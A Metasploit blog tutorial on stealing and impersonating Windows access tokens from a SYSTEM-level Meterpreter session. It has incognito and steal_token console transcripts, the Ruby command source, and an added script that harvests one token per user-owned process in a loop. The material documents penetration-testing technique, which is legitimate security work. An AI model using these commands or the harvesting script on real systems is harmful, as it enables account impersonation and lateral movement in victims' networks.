
Meterpreter Token Manipulation

In revision 8055 HD committed new code that allows a Meterpreter session running as System to manipulate tokens in a much easier manner. Just like with incognito, one can now get an access token and impersonate an account through the Meterpreter Standard API; in fact I see both as complementing each other. Let's impersonate the local Administrator account on a Windows 2003 system using incognito:

  1: meterpreter > use incognito
  2: Loading extension incognito...success.
  3: meterpreter > list_tokens -u
  4:
  5: Delegation Tokens Available
  6: ========================================
  7: NT AUTHORITY\LOCAL SERVICE
  8: NT AUTHORITY\NETWORK SERVICE
  9: NT AUTHORITY\SYSTEM
 10: WIN2K3LAB01\Administrator
 11:
 12: Impersonation Tokens Available
 13: ========================================
 14: NT AUTHORITY\ANONYMOUS LOGON

From lines 1 and 2 we can see that we have loaded the incognito extension; this injects a DLL into the process where Meterpreter is running so that we can issue its commands. At line 3 we list the tokens available to the attacker. System is the best privilege to have when running this command, since we will then see all of the tokens on the host; if we are not running as System on the target machine we will only see the tokens that our own account has used to connect to other systems. Now we will change from our current user ID to the local Administrator using incognito (note that the backslash in the account name has to be doubled on the Meterpreter command line, because a single backslash is consumed as an escape character when the command is parsed):

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token WIN2K3LAB01\\Administrator
[+] Delegation token available
[+] Successfully impersonated user WIN2K3LAB01\Administrator
meterpreter > getuid
Server username: WIN2K3LAB01\Administrator

We have now moved from System to the local Administrator. This is very useful when attacking a distributed system such as Microsoft Active Directory, where local access on its own is of little benefit but being able to act with the credentials of the accounts logged on to that system, especially administrative ones, is of great value. Note the distinction incognito draws in its listing: a delegation token can be used to authenticate to other systems on the network, while an impersonation token is only good for actions on the local machine.

The new commands in the Standard API are:

  • drop_token   Drops any token currently being impersonated.
  • getprivs     Enables as many privileges as it can on the current token.
  • steal_token  Attempts to steal the primary token of a given process and impersonate it.

These commands map to the following code in lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:

  1: #
  2: # Obtains as many privileges as possible on the target machine.
  3: #
  4: def cmd_getprivs(*args)
  5: 	print_line("=" * 60)
  6: 	print_line("Enabled Process Privileges")
  7: 	print_line("=" * 60)
  8: 	client.sys.config.getprivs.each do |priv|
  9: 		print_line("  #{priv}")
 10: 	end
 11: 	print_line("")
 12: end
 13:
 14: #
 15: # Tries to steal the primary token from the target process.
 16: #
 17:
 18: def cmd_steal_token(*args)
 19: 	if(args.length != 1 or args[0] == "-h")
 20: 		print_error("Usage: steal_token [pid]")
 21: 		return
 22: 	end
 23: 	print_line("Stolen token with username: " + client.sys.config.steal_token(args[0]))
 24: end
 25:
 26: #
 27: # Drops any assumed token.
 28: #
 29:
 30: def cmd_drop_token(*args)
 31: 	print_line("Relinquished token, now running as: " + client.sys.config.drop_token())
 32: end

The drop_token command executes the cmd_drop_token function, which, as can be seen on line 31, calls the client.sys.config.drop_token API. The getprivs command executes cmd_getprivs, which calls client.sys.config.getprivs and prints the Array it returns, the privileges that are enabled for the current token. The steal_token command executes cmd_steal_token, which calls client.sys.config.steal_token with the PID of the process whose token we want to steal as its one required argument. As can be seen, three simple API calls from inside a Meterpreter session is all it takes; this makes scripting these actions in other scripts extremely easy and sets this framework apart from others.

Let's impersonate a token that we know belongs to the Administrator account, such as the one held by the explorer.exe process of a logged-on user. We will list the processes, steal its token, check our privileges and then drop the token:

  1: meterpreter > ps
  2:
  3: Process list
  4: ============
  5:
  6:     PID   Name                 Path
  7:     ---   ----                 ----
  8:     268   smss.exe             \SystemRoot\System32\smss.exe
  9:     320   csrss.exe            \??\C:\WINDOWS\system32\csrss.exe
 10:     344   winlogon.exe         \??\C:\WINDOWS\system32\winlogon.exe
 11:     392   services.exe         C:\WINDOWS\system32\services.exe
 12:     404   lsass.exe            C:\WINDOWS\system32\lsass.exe
 13:     600   vmacthlp.exe         C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 14:     620   svchost.exe          C:\WINDOWS\system32\svchost.exe
 15:     700   svchost.exe          C:\WINDOWS\system32\svchost.exe
 16:     756   svchost.exe          C:\WINDOWS\system32\svchost.exe
 17:     784   svchost.exe          C:\WINDOWS\system32\svchost.exe
 18:     820   svchost.exe          C:\WINDOWS\System32\svchost.exe
 19:     964   spoolsv.exe          C:\WINDOWS\system32\spoolsv.exe
 20:     992   msdtc.exe            C:\WINDOWS\system32\msdtc.exe
 21:     1104  dns.exe              C:\WINDOWS\System32\dns.exe
 22:     1152  svchost.exe          C:\WINDOWS\System32\svchost.exe
 23:     1216  svchost.exe          C:\WINDOWS\system32\svchost.exe
 24:     1296  vmtoolsd.exe         C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 25:     1368  VMUpgradeHelper.exe  C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 26:     1488  wmiprvse.exe         C:\WINDOWS\system32\wbem\wmiprvse.exe
 27:     1560  svchost.exe          C:\WINDOWS\System32\svchost.exe
 28:     1704  dllhost.exe          C:\WINDOWS\system32\dllhost.exe
 29:     2164  Explorer.EXE         C:\WINDOWS\Explorer.EXE
 30:     2228  VMwareTray.exe       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 31:     2236  VMwareUser.exe       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 32:     2284  meter_224.exe        C:\Documents and Settings\Administrator\Desktop\meter_224.exe
 33:     2352  wuauclt.exe          C:\WINDOWS\system32\wuauclt.exe
 34:     2484  wmiprvse.exe         C:\WINDOWS\system32\wbem\wmiprvse.exe
 35:     3076  svhost77.exe         C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svhost77.exe
 36:     3096  taskmgr.exe          C:\WINDOWS\system32\taskmgr.exe
 37: meterpreter > steal_token 2164
 38: Stolen token with username: WIN2K3LAB01\Administrator
 39: meterpreter > getuid
 40: Server username: WIN2K3LAB01\Administrator
 41: meterpreter > drop_token
 42: Relinquished token, now running as: NT AUTHORITY\SYSTEM
    

We first executed the ps command to list all processes with their PIDs; on line 37 we used the steal_token command to steal the token of the explorer process, PID 2164, and on line 39 we confirmed with getuid that we are now running under that token. On line 41 we dropped the token and returned to running as System. The drop_token command is also useful for returning to our original identity after impersonating a token with incognito.

The getprivs command enables as many privileges as it can on the current token and lists the Windows process privileges that are now enabled:

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeTcbPrivilege
  SeAssignPrimaryTokenPrivilege
  SeLockMemoryPrivilege
  SeIncreaseQuotaPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeCreatePermanentPrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeAuditPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeUndockPrivilege
  SeManageVolumePrivilege
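To show how little glue these three calls need, here is an added example of scripting them from a Meterpreter script; it is not code from the original post or from Metasploit. It walks the process list, picks one process per account that is neither SYSTEM nor one of the service accounts (preferring explorer.exe, since the user's shell carries a full interactive logon token), steals that token, confirms the impersonation with getuid, counts the enabled privileges with getprivs, drops the token and then checks that we really are back to the identity we started with. The Metasploit calls it relies on are client.sys.process.get_processes, client.sys.config.getuid, steal_token, drop_token and getprivs, and it assumes the process list carries the user field that the updated ps command displays. Because none of that can run outside a live session, the FakeSession class is a constructed stand-in that models the token state with a process table taken from the ps output above (plus one made-up account); inside Meterpreter you would pass client to harvest_tokens instead.

```ruby
# Added example, not from the original post or from Metasploit: script the
# stdapi token calls. `session` is the Meterpreter client (`client` inside a
# script); FakeSession below is a constructed stand-in so the logic runs offline.

# Tokens that gain a SYSTEM-level session nothing: SYSTEM itself and the
# restricted service accounts. Assumption: we are hunting for user tokens.
SKIP_USERS = ["NT AUTHORITY\\SYSTEM",
              "NT AUTHORITY\\LOCAL SERVICE",
              "NT AUTHORITY\\NETWORK SERVICE"].freeze

# Pick one process per account from a get_processes-style list (hashes with
# 'pid', 'name', 'user'), preferring explorer.exe because the user's shell
# holds a full interactive logon token. Returns [[user, pid], ...] sorted by pid.
def token_candidates(processes, current_user, skip = SKIP_USERS)
  chosen = {}
  processes.each do |entry|
    user = entry['user'].to_s
    next if user.empty? || user == current_user || skip.include?(user)
    shell = entry['name'].to_s.casecmp('explorer.exe').zero?
    prev  = chosen[user]
    chosen[user] = entry if prev.nil? || (shell && !prev['name'].to_s.casecmp('explorer.exe').zero?)
  end
  chosen.map { |user, entry| [user, entry['pid']] }.sort_by { |_, pid| pid }
end

# For each candidate: steal_token, confirm with getuid, enumerate privileges,
# drop_token, and verify that the drop really returned us to the original identity.
def harvest_tokens(session)
  original = session.sys.config.getuid
  results  = []
  token_candidates(session.sys.process.get_processes, original).each do |user, pid|
    stolen   = session.sys.config.steal_token(pid)
    now      = session.sys.config.getuid
    privs    = session.sys.config.getprivs
    restored = session.sys.config.drop_token
    raise "drop_token left us as #{restored}, expected #{original}" unless restored == original
    results << { user: user, pid: pid, stolen: stolen, verified: now == stolen, privs: privs.length }
  end
  results
end

# Constructed stand-in for the Meterpreter client: a process table plus a tiny
# token state machine. Not the real Rex API, only the shape of the calls used above.
class FakeSession
  PRIVS_SYSTEM = %w[SeDebugPrivilege SeTcbPrivilege SeAssignPrimaryTokenPrivilege
                    SeBackupPrivilege SeRestorePrivilege].freeze
  PRIVS_ADMIN  = %w[SeDebugPrivilege SeBackupPrivilege SeRestorePrivilege
                    SeShutdownPrivilege].freeze

  ConfigApi = Struct.new(:s) do
    def getuid; s.current; end
    def steal_token(pid)
      entry = s.procs.find { |e| e['pid'] == pid.to_i } or raise "no such pid #{pid}"
      s.current = entry['user']            # the real call also returns the username
    end
    def drop_token; s.current = s.primary; end
    def getprivs
      s.current == s.primary ? FakeSession::PRIVS_SYSTEM : FakeSession::PRIVS_ADMIN
    end
  end
  ProcessApi = Struct.new(:s) do
    def get_processes; s.procs; end
  end
  SysApi = Struct.new(:s) do
    def config;  FakeSession::ConfigApi.new(s);  end
    def process; FakeSession::ProcessApi.new(s); end
  end

  attr_accessor :current
  attr_reader :primary, :procs, :sys
  def initialize(procs, primary)
    @procs, @primary, @current = procs, primary, primary
    @sys = SysApi.new(self)
  end
end

# Constructed process table: rows from the ps output in the post plus one
# made-up account (backupsvc) to show more than one token being harvested.
SAMPLE_PS = [
  { 'pid' => 320,  'name' => 'csrss.exe',      'user' => '' },   # user not readable
  { 'pid' => 404,  'name' => 'lsass.exe',      'user' => "NT AUTHORITY\\SYSTEM" },
  { 'pid' => 700,  'name' => 'svchost.exe',    'user' => "NT AUTHORITY\\NETWORK SERVICE" },
  { 'pid' => 784,  'name' => 'svchost.exe',    'user' => "NT AUTHORITY\\LOCAL SERVICE" },
  { 'pid' => 2228, 'name' => 'VMwareTray.exe', 'user' => "WIN2K3LAB01\\Administrator" },
  { 'pid' => 2164, 'name' => 'Explorer.EXE',   'user' => "WIN2K3LAB01\\Administrator" },
  { 'pid' => 3096, 'name' => 'taskmgr.exe',    'user' => "WIN2K3LAB01\\Administrator" },
  { 'pid' => 3200, 'name' => 'cmd.exe',        'user' => "WIN2K3LAB01\\backupsvc" }
].freeze

if __FILE__ == $0
  harvest_tokens(FakeSession.new(SAMPLE_PS, "NT AUTHORITY\\SYSTEM")).each do |r|
    puts "#{r[:user]} via pid #{r[:pid]}: verified=#{r[:verified]} privs=#{r[:privs]}"
  end
end
```

The check after drop_token is the one worth keeping in a real script: if the revert fails you carry on running as the stolen identity, and every later action in the script is attributed to that account rather than to SYSTEM.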
    

As can be seen, Meterpreter keeps being improved, making it the best payload available in Metasploit for use against Windows systems. This new token handling, combined with incognito and the ease with which it can be scripted, expands the flexibility of Meterpreter and what can be done with it.

Note:

While this post was being written the ps command was improved; it now shows under which account each process is running, which makes the new set of commands even more useful:

meterpreter > ps

Process list
============

    PID   Name                 Path                                                      User
    ---   ----                 ----                                                      ----
    268   smss.exe             \SystemRoot\System32\smss.exe                             NT AUTHORITY\SYSTEM
    300   svhost77.exe         C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svhost77.exe           NT AUTHORITY\SYSTEM
    320   csrss.exe            \??\C:\WINDOWS\system32\csrss.exe                         NT AUTHORITY\SYSTEM
    344   winlogon.exe         \??\C:\WINDOWS\system32\winlogon.exe                      NT AUTHORITY\SYSTEM
    392   services.exe         C:\WINDOWS\system32\services.exe                          NT AUTHORITY\SYSTEM
    404   lsass.exe            C:\WINDOWS\system32\lsass.exe                             NT AUTHORITY\SYSTEM
    600   vmacthlp.exe         C:\Program Files\VMware\VMware Tools\vmacthlp.exe         NT AUTHORITY\SYSTEM
    620   svchost.exe          C:\WINDOWS\system32\svchost.exe                           NT AUTHORITY\SYSTEM
    700   svchost.exe          C:\WINDOWS\system32\svchost.exe                           NT AUTHORITY\NETWORK SERVICE
    756   svchost.exe          C:\WINDOWS\system32\svchost.exe                           NT AUTHORITY\NETWORK SERVICE
    784   svchost.exe          C:\WINDOWS\system32\svchost.exe                           NT AUTHORITY\LOCAL SERVICE
    820   svchost.exe          C:\WINDOWS\System32\svchost.exe                           NT AUTHORITY\SYSTEM
    964   spoolsv.exe          C:\WINDOWS\system32\spoolsv.exe                           NT AUTHORITY\SYSTEM
    992   msdtc.exe            C:\WINDOWS\system32\msdtc.exe                             NT AUTHORITY\NETWORK SERVICE
    1104  dns.exe              C:\WINDOWS\System32\dns.exe                               NT AUTHORITY\SYSTEM
    1152  svchost.exe          C:\WINDOWS\System32\svchost.exe                           NT AUTHORITY\SYSTEM
    1216  svchost.exe          C:\WINDOWS\system32\svchost.exe                           NT AUTHORITY\LOCAL SERVICE
    1296  vmtoolsd.exe         C:\Program Files\VMware\VMware Tools\vmtoolsd.exe         NT AUTHORITY\SYSTEM
    1368  VMUpgradeHelper.exe  C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe  NT AUTHORITY\SYSTEM
    1560  svchost.exe          C:\WINDOWS\System32\svchost.exe                           NT AUTHORITY\SYSTEM
    1704  dllhost.exe          C:\WINDOWS\system32\dllhost.exe                           NT AUTHORITY\SYSTEM
    2164  Explorer.EXE         C:\WINDOWS\Explorer.EXE                                   WIN2K3LAB01\Administrator
    2228  VMwareTray.exe       C:\Program Files\VMware\VMware Tools\VMwareTray.exe       WIN2K3LAB01\Administrator
    2236  VMwareUser.exe       C:\Program Files\VMware\VMware Tools\VMwareUser.exe       WIN2K3LAB01\Administrator
    2352  wuauclt.exe          C:\WINDOWS\system32\wuauclt.exe                           WIN2K3LAB01\Administrator
    2484  wmiprvse.exe         C:\WINDOWS\system32\wbem\wmiprvse.exe                     NT AUTHORITY\SYSTEM
    3096  taskmgr.exe          C:\WINDOWS\system32\taskmgr.exe                           WIN2K3LAB01\Administrator

meterpreter >

Carlos Perez

Carlos is currently the Principal Consultant, Team Lead for Research at TrustedSec and well-known for his research on both Metasploit and Windows PowerShell. His blog www.darkoperator.com carries the tag line: "Shell Is Only The Beginning".
